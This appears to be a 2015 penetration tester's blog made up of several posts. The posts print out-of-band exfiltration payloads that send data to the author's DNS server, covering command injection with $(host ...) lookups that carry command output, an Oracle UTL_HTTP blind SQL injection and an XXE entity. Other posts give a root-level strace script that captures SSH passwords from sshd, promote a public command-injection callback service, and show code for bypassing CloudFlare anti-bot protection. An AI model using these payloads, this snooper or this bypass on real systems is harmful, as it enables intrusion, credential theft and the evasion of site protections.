Monday, December 7, 2015

Out of Band Injection Testing: Free public NS Query server

In case of blind injection testing, and in addition to previous post, i'm launching a pilot version of my DNS Server (Free for now).

Open up your terminal and connect to sudo.co.il on port 5353:

~# nc sudo.co.il 5353

..snip..
Your match string [a-z0-9]{5,} only [e.g. nicolas]: nicolas

Example query: nicolas-59.sudo.co.il
{"date": "06-Dec-2015", "query": "nicolas-59.sudo.co.il", "client": "74.125.44.140#47744:", "time": "17:27:44.409"}

In my last WebApplication Penetration Test, i was able to read source code of PHP application, and there was a place with exec() function.
The problem that I didn't get any output, and regular techniques of "sleep 60" does not seems to be working.

With my NS server I've successfully exfiltrated data over DNS queries.

PHP source:
exec('/opt/someprogram "$filename" "$tmppath"')

Successful injection:
/opt/someprogram blahblah.jpg /tmp/images$(host pwned.sudo.co.il)

Get WGET Version with this technique:
/opt/someprogram blahblah.jpg /tmp/image$(host $(wget -h|head -n1|sed 's/[ ,]/-/g'|tr -d '.').sudo.co.il)

With this output:
{"date": "xx-xxx-2015", "query": "GNU-Wget-1134--a-non-interactive-network-retriever.sudo.co.il", "client": "xx.xx.xx.xx#63325:", "time": "xx:xx:xx.xxx"}

It may be useful with Command Injection, for example:
$(host $RANDOM-test.sudo.co.il)
| ping $RANDOM-test.sudo.co.il |
&& nslookup nslookup-test.sudo.co.il &&

Blind SQL Injection like this:
SELECT * FROM products WHERE id=1||UTL_HTTP.request('http://sqli-test.sudo.co.il/') --

External ENTITY Injection:
<!ENTITY dtd SYSTEM "http://xxe-test.sudo.co.il/file.dtd">%dtd

and more.

For now, it's FREE but with limited support. (you may some $$$ if you love using it :)

Thursday, October 1, 2015

SSH Snooping in action

Got root via local privilege escalation exploit? Want his password, but can't crack?

You may try ssh snooping..

#!/bin/bash

while true; do
   ps_test=`ps ax|grep sshd|grep -v grep|grep priv|tr -s ' '`
   if [ -n "$ps_test" ]
   then
     f=$RANDOM
     a="output$RANDOM.log"
     strace -e trace=read -p $(echo $ps_test | awk '{print $1}') -o $f
     cat $f | grep 'read(6,' > $a
     rm $f
     chown root:root $a
     chmod 600 $a
   else
     echo -e ".\c"
     sleep 0.1
   fi
done




Monday, August 24, 2015

Get Remote Code Injeciton Feedback Online

Hi there, i've launched specific service, that may help you to test Remote Command Injection ONLINE. (simple and dirty, without cool design :)

Why do we need it?

Let's say, you're behind a NAT and you forgot password to your router for configuring port forwarding? :)

If you're in situation without a public IP and you can't listen to ICMP Ping requests (for example) from web-server you're testing right now, try out this service.

http://rci.sudo.co.il

Hmm... I'm not responsible for any illegal use of this service.
If you've seen this IP or domain name in logs, pay attention, somebody is testing your website for Command Injection Vulnerability.

Oh.. one more thing.. the service may disclose IPs with this vulnerability to the public.
Think twice before using it.

Thursday, August 6, 2015

URL encoding in Firefox :(

Just a little angry note...
I'm using Firefox in my web-app testing, and it fails to render DOM XSS, because of Firefox rendering document.location URL encoded. Switching to Chrome.

Good bye Firefox.

Monday, May 11, 2015

Simple CloudFlare bypass

Accidentally i've discovered a simple way to bypass CloudFlare anti DDoS protection for future website scraping purposes.
For example will take http://skidpaste.org.


If you will try to get the main page with requests python module:
>>> import requests
>>> r = requests.get('http://skidpaste.org')
>>> r.status_code
503
>>>

or with mechanize module:
>>> import mechanize
>>> br = mechanize.Browser()
>>> br.set_handle_robots(False)
>>> br.open('http://skidpaste.org')
Traceback (most recent call last):
  File "", line 1, in 
  File "/usr/local/lib/python2.7/dist-packages/mechanize/_mechanize.py", line 203, in open
    return self._mech_open(url, data, timeout=timeout)
  File "/usr/local/lib/python2.7/dist-packages/mechanize/_mechanize.py", line 255, in _mech_open
    raise response
mechanize._response.httperror_seek_wrapper: HTTP Error 403: Forbidden
>>>
There different response codes, but the main point is clear: you haven't the website content.

If we'll open the resource with Firefox browser and wait for the actual website, we'll receive a CloudFlare cookies. Which will be checked every time when you'll access the resource.



So the idea is to get these cookies, and pass to my lovely requests module :)

Pseudocode look like this:
1. Open website with selenium
2. Wait for 10 seconds
3. Get CloudFlare cookies
4. Close selenium browser.

Python example:

#!/usr/bin/python

from selenium import webdriver
from time import sleep
import cookielib
import requests

print 'Launching Firefox..'
browser = webdriver.Firefox()
print 'Entering to skidpaste.org...'
browser.get('http://skidpaste.org')
print 'Waiting 10 seconds...'
sleep(10)
a = browser.get_cookies()
print 'Got cloudflare cookies:\n'
print 'Closing Firefox..'
browser.close()

h = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:35.0) Gecko/20100101 Firefox/35.0'}

b = cookielib.CookieJar()

for i in a:
  ck = cookielib.Cookie(name=i['name'], value=i['value'], domain=i['domain'], path=i['path'], secure=i['secure'], rest=False, version=0,port=None,port_specified=False,domain_specified=False,domain_initial_dot=False,path_specified=True,expires=i['expiry'],discard=True,comment=None,comment_url=None,rfc2109=False)
  b.set_cookie(ck)

r = requests.get('http://skidpaste.org', cookies=b, headers=h)
print len(r.content)
print r.status_code

The output:
# ./cloudflare_bypass.py 
Launching Firefox..
Entering to skidpaste.org...
Waiting 10 seconds...
Got cloudflare cookies:

[{u'domain': u'.skidpaste.org', u'name': u'__cfduid', u'value': u'd8af70c3b49361a5a1b818e91171e598d1431355518', u'expiry': 1462891518, u'path': u'/', u'secure': False}, {u'domain': u'.skidpaste.org', u'name': u'cf_clearance', u'value': u'5857af9797c612cde4ac590fe900e0e9f3d7098f-1431355526-57600', u'expiry': 1431416726, u'path': u'/', u'secure': False}, {u'domain': u'skidpaste.org', u'name': u'PHPSESSID', u'value': u'eefc5d29f6cea1ddb70ca5a0baaf60e1', u'expiry': None, u'path': u'/', u'secure': False}]
Closing Firefox..
115026
200